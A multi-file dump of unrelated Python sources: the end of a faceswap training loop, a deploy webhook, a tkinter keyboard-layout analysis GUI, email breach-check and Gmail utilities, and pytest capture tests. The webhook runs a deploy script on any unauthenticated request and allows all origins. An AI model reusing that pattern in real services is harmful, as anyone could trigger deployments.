trainer)
self.run_training_cycle(model, trainer)
except KeyboardInterrupt:
try:
model.save_weights()
except KeyboardInterrupt:
print("Saving model weights has been cancelled!")
exit(0)
except Exception as err:
raise err
def load_model(self):
""" Load the model requested for training """
model_dir = get_folder(self.args.model_dir)
model = PluginLoader.get_model(self.trainer_name)(model_dir,
self.args.gpus)
model.load(swapped=False)
return model
def load_trainer(self, model):
""" Load the trainer requested for training """
images_a, images_b = self.images
trainer = PluginLoader.get_trainer(self.trainer_name)
trainer = trainer(model,
images_a,
images_b,
self.args.batch_size,
self.args.perceptual_loss)
return trainer
def run_training_cycle(self, model, trainer):
""" Perform the training cycle """
for iteration in range(0, self.args.iterations):
save_iteration = iteration % self.args.save_interval == 0
viewer = self.show if save_iteration or self.save_now else None
if save_iteration and self.timelapse is not None:
self.timelapse.work()
trainer.train_one_step(iteration, viewer)
if self.stop:
break
elif save_iteration:
model.save_weights()
elif self.save_now:
model.save_weights()
self.save_now = False
model.save_weights()
self.stop = True
def monitor_preview(self):
""" Generate the preview window and wait for keyboard input """
print("Using live preview.\n"
"Press 'ENTER' on the preview window to save and quit.\n"
"Press 'S' on the preview window to save model weights "
"immediately")
while True:
try:
with self.lock:
for name, image in self.preview_buffer.items():
cv2.imshow(name, image)
key = cv2.waitKey(1000)
if key == ord("\n") or key == ord("\r"):
break
if key == ord("s"):
self.save_now = True
if self.stop:
break
except KeyboardInterrupt:
break
@staticmethod
def monitor_console():
""" Monitor the console for any input followed by enter or ctrl+c """
# TODO: how to catch a specific key instead of Enter?
# there isn't a good multiplatform solution:
# https://stackoverflow.com/questions/3523174
# TODO: Find a way to interrupt input() if the target iterations are
# reached. At the moment, setting a target iteration and using the -p
# flag is the only guaranteed way to exit the training loop on
# hitting target iterations.
print("Starting. Press 'ENTER' to stop training and save model")
try:
input()
except KeyboardInterrupt:
pass
@staticmethod
def set_tf_allow_growth():
""" Allow TensorFlow to manage VRAM growth """
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.gpu_options.visible_device_list = "0"
set_session(tf.Session(config=config))
def show(self, image, name=""):
""" Generate the preview and write preview file output """
try:
scriptpath = os.path.realpath(os.path.dirname(sys.argv[0]))
if self.args.write_image:
img = "_sample_{}.jpg".format(name)
imgfile = os.path.join(scriptpath, img)
cv2.imwrite(imgfile, image)
if self.args.redirect_gui:
img = ".gui_preview_{}.jpg".format(name)
imgfile = os.path.join(scriptpath, "lib", "gui",
".cache", "preview", img)
cv2.imwrite(imgfile, image)
if self.args.preview:
with self.lock:
self.preview_buffer[name] = image
except Exception as err:
print("could not preview sample")
raise err
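# A minimal sketch of the attribute bag Train() expects; in faceswap proper this
# namespace comes from the command-line parser, so every value below is purely
# illustrative and "Original" stands in for whichever trainer plugin is installed.
def _example_arguments():
    from types import SimpleNamespace
    return SimpleNamespace(
        trainer="Original", model_dir="models", gpus=1,
        input_A="faces/A", input_B="faces/B",
        timelapse_input_A=None, timelapse_input_B=None, timelapse_output=None,
        batch_size=64, iterations=100000, save_interval=100,
        perceptual_loss=False, allow_growth=False, verbose=False,
        preview=False, write_image=False, redirect_gui=False)
# Train(_example_arguments()).process()  # would start a full training run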
|
webhook.py
|
from wsgiref.simple_server import make_server
import subprocess
import json
import threading
def deploy():
subprocess.call(['bash', 'deploy.sh'])
def webhook(environ, start_response):
print("Get Request!")
status = '200 OK'
headers = [
('Content-type', 'application/json; charset=utf-8'),
('Access-Control-Allow-Origin', '*'),
]
start_response(status, headers)
deploy_thread = threading.Thread(target=deploy)
deploy_thread.start()
return [json.dumps({'message': 'OK'}).encode("utf-8")]
httpd = make_server('', 54333, webhook)
print("Serving on port 54333...")
httpd.serve_forever()
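# Manual test sketch (illustrative URL): any HTTP request to the port triggers
# deploy() in a background thread while the hook replies immediately, e.g.
#   curl -X POST http://localhost:54333/
# or, from Python:
#   import requests; print(requests.post("http://localhost:54333/").json())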
|
gui_element.py
|
from tkinter import *
from tkinter.filedialog import askopenfilename, asksaveasfilename
from tkinter.messagebox import askyesno
from kbana import quick_plot, load_recording, save_recording
from kbana.analysis import simulate_recording
from matplotlib.backends.backend_tkagg import (
FigureCanvasTkAgg, NavigationToolbar2Tk)
# Implement the default Matplotlib key bindings.
from matplotlib.backend_bases import key_press_handler
from matplotlib.figure import Figure
import queue
import threading
from functools import wraps
class ThreadReturn(queue.Queue):
def result(self):
try:
value = self.get(block=False)
except Exception as e:
value = 'there is no result yet'
return value
thread_return = ThreadReturn()
def thread_function(f):
@wraps(f)
def wrapper(*args, **kwargs):
thread_return.put(f(*args, **kwargs))
return wrapper
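# A small usage sketch for the decorator above: the wrapped call runs inside a
# worker thread and its return value is fetched later through thread_return;
# _slow_add is an illustrative function, not part of the GUI code below.
@thread_function
def _slow_add(a, b):
    return a + b
# threading.Thread(target=_slow_add, args=(1, 2)).start()
# ... later: thread_return.result() returns 3, or the placeholder string if not ready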
def _quick_plot(recording, status):
if len(recording) == 0:
status.set('The record is empty')
else:
fig, recording = quick_plot(recording, numeric='percent')
fig.set_size_inches(12, 9)
graph_frame = PopMatplotlibCanvas(fig)
class MenuBar(Menu):
def __init__(self, master, status, analysis_frame, record_session):
Menu.__init__(self, master)
file_menu = Menu(self, tearoff=0)
file_menu.add_command(label='Open text', command=self.open_text)
file_menu.add_separator()
file_menu.add_command(label='Export Recording', command=self.export_recording)
file_menu.add_separator()
file_menu.add_command(label='Quit', command=master.quit)
tools_menu = Menu(self, tearoff=0)
tools_menu.add_command(label='Visualize record', command=self.visualize_record)
tools_menu.add_separator()
tools_menu.add_command(label='Records key stroke', command=self.record_key_stroke)
# tools_menu.add_command(label='Clear record', command=self.clear_record)
self.add_cascade(label='File', menu=file_menu)
self.add_cascade(label='Tools', menu=tools_menu)
self.status = status
self.text_input = analysis_frame.text_input
self.analysis_frame = analysis_frame
self.record_session = record_session
def open_text(self):
answer = askyesno('Warning', 'The currently input text will be deleted, do you want to continue?')
if answer:
self.status.set('Choose text file')
path_to_file = askopenfilename()
if path_to_file:
with open(path_to_file, 'r', encoding='utf-8') as f:
text = f.read()
self.text_input.delete('1.0', END)
self.text_input.insert('1.0', text)
else:
self.status.set('File is not selected')
def export_recording(self):
if self.analysis_frame.recording is not None:
self.status.set("loading simulated record")
recording = self.analysis_frame.recording
else:
self.status.set("simulating recording")
text = self.analysis_frame.text_input_read()
if text != 0:
recording = simulate_recording(text, layout=self.analysis_frame.option_var.get())
else:
return 0
if recording is not None:
self.status.set("saving...")
save_filename = asksaveasfilename(defaultextension=".pyd",
filetypes=(("python dict", "*.pyd"), ("json", "*.json")))
if save_filename == "":
self.status.set("save file name is not specified")
else:
save_recording(recording, save_filename)
self.status.set("Done")
self.status.set("Ready")
return 0
def visualize_record(self):
self.status.set('Choose record file')
path_to_file = askopenfilename()
records = load_recording(path_to_file)
_quick_plot(records, self.status)
def record_key_stroke(self):
panel = RecordPanel(self.record_session, self.status)
panel.record()
def clear_record(self):
self.record_session._recording = {}
class RecordPanel(Toplevel):
def __init__(self, record_session, status):
Toplevel.__init__(self)
self.record_button = Button(self, text='record', command=self.toggle_record)
self.record_button.configure(bg='#fdedec', fg='#000000', width=10, height=4)
self.record_button.pack(pady=2.5)
self.state = BooleanVar(value=False)
action_frame = Frame(self)
Button(action_frame, text='Save', command=self.save).pack(side=LEFT, fill=X, expand=True)
Button(action_frame, text='Clear', command=self.clear).pack(side=LEFT, fill=X)
action_frame.pack(fill=X, padx=2.5, pady=2.5)
Button(self, text='visualize', command=self.visualize).pack(fill=X, padx=2.5, pady=2.5)
self.status = status
self.record_session = record_session
self.thread = threading.Thread(target=self._record_coro)
def toggle_record(self):
if self.state.get(): # switch to idle state
self.state.set(False)
self.record_button.configure(text='record', bg='#fdedec', fg='#000000')
self.record_button.update()
else:
self.state.set(True) # switch to record state
self.record_button.configure(text='stop', bg='#c0392b', fg='#FFFFFF')
self.record_button.update()
def save(self):
# print(self.record_session.records)
filename = asksaveasfilename()
if filename != '':
self.record_session.save_recording(filename)
def clear(self):
answer = askyesno("Warning", "You are about to remove all of records, do you want to continue?")
if answer:
self.record_session._recording = {}
def visualize(self):
_quick_plot(self.record_session.recording, self.status)
@thread_function
def _record_coro(self):
return self.record_session.record()
def record(self):
if self.state.get():
            # if there is no result and the thread is still alive, do nothing;
            # if there is a result, the thread has finished, so start a new one
x = thread_return.result()
# print(x)
if not ((x != 0) and self.thread.is_alive()):
# print(f"alive: {self.thread.is_alive()}")
try:
self.thread.start()
except RuntimeError:
self.thread = threading.Thread(target=self._record_coro)
self.thread.start()
self.after(2, self.record) # support up to 500 words/minute
class StatusBar(Frame):
def __init__(self, master, status_stringvar):
Frame.__init__(self, master)
self.status_text = status_stringvar
self.status_text.set("Ready")
self.status = Label(textvariable=self.status_text, relief=RIDGE)
self.status.config(anchor=E)
self.status.pack(fill=X, padx=5, pady=2.5)
def set(self, status_text):
self.status_text.set(status_text)
self.status.update()
class MatplotlibCanvas(Frame):
def __init__(self, master, fig):
Frame.__init__(self, master)
canvas = FigureCanvasTkAgg(fig, master=self) # A tk.DrawingArea.
canvas.draw()
# pack_toolbar=False will make it easier to use a layout manager later on.
toolbar = NavigationToolbar2Tk(canvas, self, pack_toolbar=False)
toolbar.update()
canvas.mpl_connect(
"key_press_event", lambda event: print(f"you pressed {event.key}"))
canvas.mpl_connect("key_press_event", key_press_handler)
# button = Button(master=self, text="Quit", command=self.quit)
# Packing order is important. Widgets are processed sequentially and if there
# is no space left, because the window is too small, they are not displayed.
# The canvas is rather flexible in its size, so we pack it last which makes
# sure the UI controls are displayed as long as possible.
# button.pack(side=BOTTOM)
toolbar.pack(side=BOTTOM, fill=X)
canvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=1)
class PopMatplotlibCanvas(Toplevel):
def __init__(self, fig):
Toplevel.__init__(self)
canvas = MatplotlibCanvas(self, fig)
canvas.pack()
self.title('Visualization')
class AnalyseFrame(Frame):
def __init__(self, master, status):
Frame.__init__(self, master)
Label(self, text='Input Text').pack()
self.status = status
self.text_input = Text(self)
self.text_input.pack(padx=5, pady=2.5, fill=BOTH)
panel = Frame(self)
layout_nest = Frame(panel)
layout_option = ['qwerty', 'pattachoat', 'kedmanee']
Label(layout_nest, text='Layout: ').pack(side=LEFT)
self.option_var = StringVar()
self.option_var.set(layout_option[0])
self.layout_select = OptionMenu(layout_nest, self.option_var, *layout_option)
self.layout_select.pack(side=LEFT)
layout_nest.pack(fill=X, side=LEFT)
analyse_button = Button(panel, text='Visualize', command=self.analyze, bg='#abebc6')
analyse_button.pack(side=LEFT, fill=X, expand=TRUE, padx=2.5)
clear_button = Button(panel, text='Clear', command=self.clear_text, bg='#f1948a')
clear_button.pack(side=LEFT)
panel.pack(padx=5, pady=2.5, fill=X)
self.recording = None
def text_input_read(self):
text = self.text_input.get('1.0', END)
        # A blank Text widget returns just '\n'; if the input is blank, abort.
if text == '\n':
message = 'Please input some characters'
print(message)
self.status.set(message)
return 0
return text
def analyze(self):
text = self.text_input_read()
if text == 0:
return 0
self.status.set('Analyzing')
# fig = quick_plot(text, layout=self.option_var.get(), numeric='percent')
try:
fig, self.recording = quick_plot(text, layout=self.option_var.get(), numeric='percent')
fig.set_size_inches(12, 9)
graph_frame = PopMatplotlibCanvas(fig)
except Exception as e:
print(e)
self.status.set(e)
else:
self.status.set('Done')
self.status.set('Ready')
def clear_text(self):
        answer = askyesno('Warning', 'You are about to remove all text. Do you want to continue?')
if answer:
self.text_input.delete('1.0', END)
def _on_key_release(event):
ctrl = (event.state & 0x4) != 0
if event.keycode == 88 and ctrl and event.keysym.lower() != "x":
event.widget.event_generate("<<Cut>>")
if event.keycode == 86 and ctrl and event.keysym.lower() != "v":
event.widget.event_generate("<<Paste>>")
if event.keycode == 67 and ctrl and event.keysym.lower() != "c":
event.widget.event_generate("<<Copy>>")
|
utils.py
|
import requests
import sys
import time
import threading
import smtplib
import datetime
import json
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
now = datetime.datetime.now()
class Spinner:
busy = False
delay = 0.1
@staticmethod
def spinning_cursor():
while 1:
for cursor in '|/-\\': yield cursor
def __init__(self, delay=None):
self.spinner_generator = self.spinning_cursor()
if delay and float(delay): self.delay = delay
def spinner_task(self):
while self.busy:
sys.stdout.write(next(self.spinner_generator))
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write('\b')
sys.stdout.flush()
def start(self):
self.busy = True
threading.Thread(target=self.spinner_task).start()
def stop(self):
self.busy = False
time.sleep(self.delay)
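# --- Hypothetical usage sketch, not part of the original script ---
# The spinner animates in a background thread between start() and stop();
# wrap any long blocking call with those two calls to show console progress.
def _demo_spinner(work_seconds=2.0):
    spinner = Spinner(delay=0.2)
    spinner.start()            # spawns the spinner_task thread
    time.sleep(work_seconds)   # stand-in for a long-running blocking call
    spinner.stop()             # clears the busy flag so the thread exits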
def build_all_list_body(nopwn_list, pwn_list):
new_nopwn_list = []
new_pwn_dict = {}
new_pwn_list = []
for i in nopwn_list:
new_nopwn_list.append('<br />{}<br />'.format(i))
for k in pwn_list:
str1 = ''
for site in pwn_list[k]:
str1 += ' {}, '.format(site)
new_pwn_dict[k] = str1
for k in new_pwn_dict:
new_pwn_list.append('<p><br />{key} :{list}</p>'.format(key=k, list=new_pwn_dict[k]))
html = """\
<html>
<head></head>
<body>
<p>Hi (your name),</p>
<h4>These Emails have not been pwned:</h4>{new_nopwn_list}
<h4>Oh no! These emails have been pwned:</h4>
{new_pwn_list}
<h4><br />Yours Truly,<br /> (your name) ;)</h4>
</body>
</html>
""".format(new_nopwn_list=''.join(new_nopwn_list), new_pwn_list='\n'.join(new_pwn_list))
return html
"""Returns a list of sites where email was pwned"""
def check(email, url):
full_url = url + email
final_data = []
r = requests.get(full_url)
if r:
data = r.text.strip('[').strip(']')
data = data.split(',')
for site in data:
final_data.append(site.strip('"'))
return final_data
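# --- Hypothetical usage sketch, not part of the original script ---
# check() only appends the email to whatever base URL it is given, so the
# caller must supply the correct breach-lookup endpoint; the URL below is a
# placeholder, not a verified API route.
def _demo_check():
    api_url = "https://example.invalid/api/breachedaccount/"  # placeholder endpoint
    return check("someone@example.com", api_url)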
def build_nopwn_body(email):
html = """\
<html>
<head></head>
<body>
<h4>Hi,</h4>
<h4>Congrats! Your email: <strong><span style="color: #ff0000;">"{email}"</span></strong> has not been pwned.</h4>
<h4>To verify you can go to: https://haveibeenpwned.com/</h4>
<h4><br />Yours Truly,<br />(your name) ;)</h4>
</body>
</html>
""".format(email=email)
return html
def build_pwn_body(email, sites):
str1 = """\
<html>
<head></head>
<body>
<p>Hi,
<br />
<br />Sorry! Your email: <span style="color: #ff0000;"><em><strong>"{email}"</strong></em></span> has been pwned. These sites have been compromised containing your email:
""".format(email=email)
str2 = """\
<br />
<br />You should change your password on each of these sites ASAP.
<br />
<br />To verify you can go to: https://haveibeenpwned.com/
<br />
<br />
<br />Yours Truly,
<br />(your name)</p>
</body>
</html>
""".format(email=email)
for site in sites:
string = '<br /><strong>- {site}</strong>'.format(site=site)
str1 += string
html = str1 + str2
return html
# This function sends a confirmation email and text
def send_email(currentEmail, body):
#Fill in service account information / credentials
gmail_user = ""
gmail_pwd = ""
FROM = ""
TOEMAIL = currentEmail if type(currentEmail) is list else [currentEmail]
SUBJECT = 'checkpwned {}'.format(now.date())
HTML = body
# Create message container - the correct MIME type is multipart/alternative.
msg = MIMEMultipart('alternative')
msg['Subject'] = SUBJECT
msg['From'] = FROM
msg['To'] = ",".join(TOEMAIL)
# # Record the MIME types of both parts - text/plain and text/html.
part2 = MIMEText(HTML, 'html')
#
# # Attach parts into message container.
# # According to RFC 2046, the last part of a multipart message, in this case
# # the HTML message, is best and preferred.
msg.attach(part2)
try:
server_ssl = smtplib.SMTP_SSL("smtp.gmail.com", 465)
server_ssl.ehlo() # optional, called by login()
server_ssl.login(gmail_user, gmail_pwd)
        server_ssl.sendmail(FROM, TOEMAIL, msg.as_string())  # pass the recipient list, not the comma-joined header string
        server_ssl.close()
        return 'Successfully sent the Email confirmation to: {}'.format(currentEmail)
    except (smtplib.SMTPException, OSError) as e:
        return "Failed to send mail because of:\n{}".format(e)
|
test_capture.py
|
import contextlib
import io
import os
import subprocess
import sys
import textwrap
from io import UnsupportedOperation
from typing import BinaryIO
from typing import cast
from typing import Generator
from typing import TextIO
import pytest
from _pytest import capture
from _pytest.capture import _get_multicapture
from _pytest.capture import CaptureManager
from _pytest.capture import CaptureResult
from _pytest.capture import MultiCapture
from _pytest.config import ExitCode
from _pytest.pytester import Testdir
# note: py.io capture tests were copied from
# pylib 1.4.20.dev2 (rev 13d9af95547e)
def StdCaptureFD(
out: bool = True, err: bool = True, in_: bool = True
) -> MultiCapture[str]:
return capture.MultiCapture(
in_=capture.FDCapture(0) if in_ else None,
out=capture.FDCapture(1) if out else None,
err=capture.FDCapture(2) if err else None,
)
def StdCapture(
out: bool = True, err: bool = True, in_: bool = True
) -> MultiCapture[str]:
return capture.MultiCapture(
in_=capture.SysCapture(0) if in_ else None,
out=capture.SysCapture(1) if out else None,
err=capture.SysCapture(2) if err else None,
)
def TeeStdCapture(
out: bool = True, err: bool = True, in_: bool = True
) -> MultiCapture[str]:
return capture.MultiCapture(
in_=capture.SysCapture(0, tee=True) if in_ else None,
out=capture.SysCapture(1, tee=True) if out else None,
err=capture.SysCapture(2, tee=True) if err else None,
)
class TestCaptureManager:
@pytest.mark.parametrize("method", ["no", "sys", "fd"])
def test_capturing_basic_api(self, method):
capouter = StdCaptureFD()
old = sys.stdout, sys.stderr, sys.stdin
try:
capman = CaptureManager(method)
capman.start_global_capturing()
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method == "no":
assert old == (sys.stdout, sys.stderr, sys.stdin)
else:
assert not out
capman.resume_global_capture()
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method != "no":
assert out == "hello\n"
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
def test_init_capturing(self):
capouter = StdCaptureFD()
try:
capman = CaptureManager("fd")
capman.start_global_capturing()
pytest.raises(AssertionError, capman.start_global_capturing)
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_unicode(testdir, method):
obj = "'b\u00f6y'"
testdir.makepyfile(
"""\
# taken from issue 227 from nosetests
def test_unicode():
import sys
print(sys.stdout)
print(%s)
"""
% obj
)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_bytes_in_utf8_encoding(testdir, method):
testdir.makepyfile(
"""\
def test_unicode():
print('b\\u00f6y')
"""
)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
def test_collect_capturing(testdir):
p = testdir.makepyfile(
"""
import sys
print("collect %s failure" % 13)
sys.stderr.write("collect %s_stderr failure" % 13)
import xyz42123
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*Captured stdout*",
"collect 13 failure",
"*Captured stderr*",
"collect 13_stderr failure",
]
)
class TestPerTestCapturing:
def test_capture_and_fixtures(self, testdir):
p = testdir.makepyfile(
"""
def setup_module(mod):
print("setup module")
def setup_function(function):
print("setup " + function.__name__)
def test_func1():
print("in func1")
assert 0
def test_func2():
print("in func2")
assert 0
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"setup module*",
"setup test_func1*",
"in func1*",
"setup test_func2*",
"in func2*",
]
)
@pytest.mark.xfail(reason="unimplemented feature")
def test_capture_scope_cache(self, testdir):
p = testdir.makepyfile(
"""
import sys
def setup_module(func):
print("module-setup")
def setup_function(func):
print("function-setup")
def test_func():
print("in function")
assert 0
def teardown_function(func):
print("in teardown")
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*test_func():*",
"*Captured stdout during setup*",
"module-setup*",
"function-setup*",
"*Captured stdout*",
"in teardown*",
]
)
def test_no_carry_over(self, testdir):
p = testdir.makepyfile(
"""
def test_func1():
print("in func1")
def test_func2():
print("in func2")
assert 0
"""
)
result = testdir.runpytest(p)
s = result.stdout.str()
assert "in func1" not in s
assert "in func2" in s
def test_teardown_capturing(self, testdir):
p = testdir.makepyfile(
"""
def setup_function(function):
print("setup func1")
def teardown_function(function):
print("teardown func1")
assert 0
def test_func1():
print("in func1")
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*teardown_function*",
"*Captured stdout*",
"setup func1*",
"in func1*",
"teardown func1*",
# "*1 fixture failure*"
]
)
def test_teardown_capturing_final(self, testdir):
p = testdir.makepyfile(
"""
def teardown_module(mod):
print("teardown module")
assert 0
def test_func():
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*def teardown_module(mod):*",
"*Captured stdout*",
"*teardown module*",
"*1 error*",
]
)
def test_capturing_outerr(self, testdir):
p1 = testdir.makepyfile(
"""\
import sys
def test_capturing():
print(42)
sys.stderr.write(str(23))
def test_capturing_error():
print(1)
sys.stderr.write(str(2))
raise ValueError
"""
)
result = testdir.runpytest(p1)
result.stdout.fnmatch_lines(
[
"*test_capturing_outerr.py .F*",
"====* FAILURES *====",
"____*____",
"*test_capturing_outerr.py:8: ValueError",
"*--- Captured stdout *call*",
"1",
"*--- Captured stderr *call*",
"2",
]
)
class TestLoggingInteraction:
def test_logging_stream_ownership(self, testdir):
p = testdir.makepyfile(
"""\
def test_logging():
import logging
import pytest
stream = capture.CaptureIO()
logging.basicConfig(stream=stream)
stream.close() # to free memory/release resources
"""
)
result = testdir.runpytest_subprocess(p)
assert result.stderr.str().find("atexit") == -1
def test_logging_and_immediate_setupteardown(self, testdir):
p = testdir.makepyfile(
"""\
import logging
def setup_function(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_function(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors show first!
)
# verify proper termination
assert "closed" not in s
def test_logging_and_crossscope_fixtures(self, testdir):
p = testdir.makepyfile(
"""\
import logging
def setup_module(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_module(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors come first
)
# verify proper termination
assert "closed" not in s
def test_conftestlogging_is_shown(self, testdir):
testdir.makeconftest(
"""\
import logging
logging.basicConfig()
logging.warning("hello435")
"""
)
# make sure that logging is still captured in tests
result = testdir.runpytest_subprocess("-s", "-p", "no:capturelog")
assert result.ret == ExitCode.NO_TESTS_COLLECTED
result.stderr.fnmatch_lines(["WARNING*hello435*"])
assert "operation on closed file" not in result.stderr.str()
def test_conftestlogging_and_test_logging(self, testdir):
testdir.makeconftest(
"""\
import logging
logging.basicConfig()
"""
)
# make sure that logging is still captured in tests
p = testdir.makepyfile(
"""\
def test_hello():
import logging
logging.warning("hello433")
assert 0
"""
)
result = testdir.runpytest_subprocess(p, "-p", "no:capturelog")
assert result.ret != 0
result.stdout.fnmatch_lines(["WARNING*hello433*"])
assert "something" not in result.stderr.str()
assert "operation on closed file" not in result.stderr.str()
def test_logging_after_cap_stopped(self, testdir):
testdir.makeconftest(
"""\
import pytest
import logging
log = logging.getLogger(__name__)
@pytest.fixture
def log_on_teardown():
yield
log.warning('Logging on teardown')
"""
)
# make sure that logging is still captured in tests
p = testdir.makepyfile(
"""\
def test_hello(log_on_teardown):
import logging
logging.warning("hello433")
assert 1
raise KeyboardInterrupt()
"""
)
result = testdir.runpytest_subprocess(p, "--log-cli-level", "info")
assert result.ret != 0
result.stdout.fnmatch_lines(
["*WARNING*hello433*", "*WARNING*Logging on teardown*"]
)
assert (
"AttributeError: 'NoneType' object has no attribute 'resume_capturing'"
not in result.stderr.str()
)
class TestCaptureFixture:
@pytest.mark.parametrize("opt", [[], ["-s"]])
def test_std_functional(self, testdir, opt):
reprec = testdir.inline_runsource(
"""\
def test_hello(capsys):
print(42)
out, err = capsys.readouterr()
assert out.startswith("42")
""",
*opt,
)
reprec.assertoutcome(passed=1)
def test_capsyscapfd(self, testdir):
p = testdir.makepyfile(
"""\
def test_one(capsys, capfd):
pass
def test_two(capfd, capsys):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*ERROR*setup*test_one*",
"E*capfd*capsys*same*time*",
"*ERROR*setup*test_two*",
"E*capsys*capfd*same*time*",
"*2 errors*",
]
)
def test_capturing_getfixturevalue(self, testdir):
"""Test that asking for "capfd" and "capsys" using request.getfixturevalue
in the same test is an error.
"""
testdir.makepyfile(
"""\
def test_one(capsys, request):
request.getfixturevalue("capfd")
def test_two(capfd, request):
request.getfixturevalue("capsys")
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(
[
"*test_one*",
"E * cannot use capfd and capsys at the same time",
"*test_two*",
"E * cannot use capsys and capfd at the same time",
"*2 failed in*",
]
)
def test_capsyscapfdbinary(self, testdir):
p = testdir.makepyfile(
"""\
def test_one(capsys, capfdbinary):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
["*ERROR*setup*test_one*", "E*capfdbinary*capsys*same*time*", "*1 error*"]
)
@pytest.mark.parametrize("method", ["sys", "fd"])
def test_capture_is_represented_on_failure_issue128(self, testdir, method):
p = testdir.makepyfile(
"""\
def test_hello(cap{}):
print("xxx42xxx")
assert 0
""".format(
method
)
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["xxx42xxx"])
def test_stdfd_functional(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capfd):
import os
os.write(1, b"42")
out, err = capfd.readouterr()
assert out.startswith("42")
capfd.close()
"""
)
reprec.assertoutcome(passed=1)
@pytest.mark.parametrize("nl", ("\n", "\r\n", "\r"))
def test_cafd_preserves_newlines(self, capfd, nl):
print("test", end=nl)
out, err = capfd.readouterr()
assert out.endswith(nl)
def test_capfdbinary(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capfdbinary):
import os
# some likely un-decodable bytes
os.write(1, b'\\xfe\\x98\\x20')
out, err = capfdbinary.readouterr()
assert out == b'\\xfe\\x98\\x20'
assert err == b''
"""
)
reprec.assertoutcome(passed=1)
def test_capsysbinary(self, testdir):
p1 = testdir.makepyfile(
r"""
def test_hello(capsysbinary):
import sys
sys.stdout.buffer.write(b'hello')
# Some likely un-decodable bytes.
sys.stdout.buffer.write(b'\xfe\x98\x20')
sys.stdout.buffer.flush()
# Ensure writing in text mode still works and is captured.
# https://github.com/pytest-dev/pytest/issues/6871
print("world", flush=True)
out, err = capsysbinary.readouterr()
assert out == b'hello\xfe\x98\x20world\n'
assert err == b''
print("stdout after")
print("stderr after", file=sys.stderr)
"""
)
result = testdir.runpytest(str(p1), "-rA")
result.stdout.fnmatch_lines(
[
"*- Captured stdout call -*",
"stdout after",
"*- Captured stderr call -*",
"stderr after",
"*= 1 passed in *",
]
)
def test_partial_setup_failure(self, testdir):
p = testdir.makepyfile(
"""\
def test_hello(capsys, missingarg):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["*test_partial_setup_failure*", "*1 error*"])
def test_keyboardinterrupt_disables_capturing(self, testdir):
p = testdir.makepyfile(
"""\
def test_hello(capfd):
import os
os.write(1, b'42')
raise KeyboardInterrupt()
"""
)
result = testdir.runpytest_subprocess(p)
result.stdout.fnmatch_lines(["*KeyboardInterrupt*"])
assert result.ret == 2
def test_capture_and_logging(self, testdir):
"""#14"""
p = testdir.makepyfile(
"""\
import logging
def test_log(capsys):
logging.error('x')
"""
)
result = testdir.runpytest_subprocess(p)
assert "closed" not in result.stderr.str()
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
@pytest.mark.parametrize("no_capture", [True, False])
def test_disabled_capture_fixture(self, testdir, fixture, no_capture):
testdir.makepyfile(
"""\
def test_disabled({fixture}):
print('captured before')
with {fixture}.disabled():
print('while capture is disabled')
print('captured after')
assert {fixture}.readouterr() == ('captured before\\ncaptured after\\n', '')
def test_normal():
print('test_normal executed')
""".format(
fixture=fixture
)
)
args = ("-s",) if no_capture else ()
result = testdir.runpytest_subprocess(*args)
result.stdout.fnmatch_lines(["*while capture is disabled*", "*= 2 passed in *"])
result.stdout.no_fnmatch_line("*captured before*")
result.stdout.no_fnmatch_line("*captured after*")
if no_capture:
assert "test_normal executed" in result.stdout.str()
else:
result.stdout.no_fnmatch_line("*test_normal executed*")
def test_disabled_capture_fixture_twice(self, testdir: Testdir) -> None:
"""Test that an inner disabled() exit doesn't undo an outer disabled().
Issue #7148.
"""
testdir.makepyfile(
"""
def test_disabled(capfd):
print('captured before')
with capfd.disabled():
print('while capture is disabled 1')
with capfd.disabled():
print('while capture is disabled 2')
print('while capture is disabled 1 after')
print('captured after')
assert capfd.readouterr() == ('captured before\\ncaptured after\\n', '')
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
[
"*while capture is disabled 1",
"*while capture is disabled 2",
"*while capture is disabled 1 after",
],
consecutive=True,
)
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures(self, testdir, fixture):
"""Ensure that capsys and capfd can be used by other fixtures during
